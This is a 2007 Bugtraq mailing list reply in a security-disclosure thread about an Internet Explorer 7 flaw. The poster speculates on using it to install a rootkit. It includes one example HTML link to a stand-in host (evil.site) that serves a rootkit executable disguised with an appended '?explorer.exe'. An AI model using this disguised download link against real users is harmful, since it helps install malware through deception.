Bugtraq mailing list archives

Re: RE: playing for fun with <=IE7

From: jason.gerfen () gmail com
Date: 15 Oct 2007 15:28:13 -0000

So to root the box just some simple social engineering is needed? I mean technically speaking if someone clicks a link 
that downloads a rootkit for example, then appends "?explorer.exe" or equivalent wouldn't it be executed as a normal 
application? And if your rootkit was silent installer they are now rooted? Right?

<a href="https://www.evil.site/rootkit.exe?explorer.exe";>click this link</a>

Current thread:

playing for fun with <=IE7 laurent . gaffie (Oct 13)
- RE: playing for fun with <=IE7 Roger A. Grimes (Oct 15)
- RE: playing for fun with <=IE7 James C. Slora Jr. (Oct 15)
- RE: playing for fun with <=IE7 avivra (Oct 16)
- <Possible follow-ups>
- Re: RE: playing for fun with <=IE7 jason . gerfen (Oct 15)
- Re: Re: RE: playing for fun with <=IE7 laurent . gaffie (Oct 25)